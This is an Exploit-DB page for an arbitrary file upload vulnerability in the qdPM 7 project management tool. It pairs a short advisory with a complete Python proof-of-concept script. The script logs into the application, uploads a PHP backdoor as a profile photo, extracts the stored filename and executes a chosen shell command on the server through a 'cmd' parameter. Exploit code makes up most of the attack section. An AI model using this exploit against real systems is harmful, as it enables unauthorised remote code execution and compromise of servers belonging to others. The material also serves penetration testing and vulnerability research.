qdPM 7 - Arbitrary File upload

EDB-ID:

19154

CVE:


EDB Verified:

Author:

loneferret

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-06-14

Vulnerable App: 
######################################################################################
# Exploit qdPM  v.7 Arbitrary File upload
# Date: June 13th 2012
# Author: loneferret
# Version: 7
# Vendor Url: http://qdpm.net/
# Tested on: Winddows XP / XAMPP
######################################################################################
# Discovered by: loneferret
######################################################################################

# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects. 
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact 
# using a Ticket System that is integrated into Task management. 

# Vulnerability:
# Application does not verify the file's extension when uploading an image for a user's profile.
# Making it possible to upload a small php shell, and accessing it remotely. 

# Note(s): 
# One needs a valid user account to upload the file. (Client will do)
# No need to be authenticated to access the file.

# Uploading file:
# Once logged in, upload file here:
# Page: /qdPM/index.php/home/myAccount

# Access file:
# File can be found here:
# /qdPM/uploads/users/<filename>
#
# Note the filename will contain a random number. One need to 
# to look at the source code from the browser to find it.
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />



----- python script -----
#!/usr/bin/python

import re, mechanize
import urllib, sys

print "\n[*] qdPM v.7  Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

# Login into site
try:
        print "[*] Loging in ."
        br = mechanize.Browser()
        br.open("http://%s/qdPM/index.php/home/login" % rhost)
        assert br.viewing_html()
        br.select_form(name="UsersForm")
        br.select_form(nr=0)
        br.form['login[email]'] = "loneferret@test.com"
        br.form['login[password]'] = "123456"
        print "[*] Hope this works"
        br.submit()

except:
        print "[*] Oups..."
        exit(0)

# Upload malicious file
try:
        print "[*] Uploading shell .."
        br.open("http://%s/qdPM/home/myAccount" % rhost)
        assert br.viewing_html()
        br.select_form(name="UsersAccountForm")
        br.select_form(nr=0)
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
        br.submit(nr=0)

except:
        print "[-] Upload didn't work."
        exit(0)

# Get file name once saved
try:
        br.select_form(name="UsersAccountForm")
        for form in br.forms():
                filename = form.controls[9].value
                print "[*] Filename is now: " + filename

        url = "http://%s/qdPM/uploads/users " % rhost
        url += "/%s?cmd=%s" % (filename,rcmd)
        print "[*] Executing command:\n"
        resp = urllib.urlopen(url)
        print resp.read()

except:
        print "[-] Oups..."
        exit(0)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services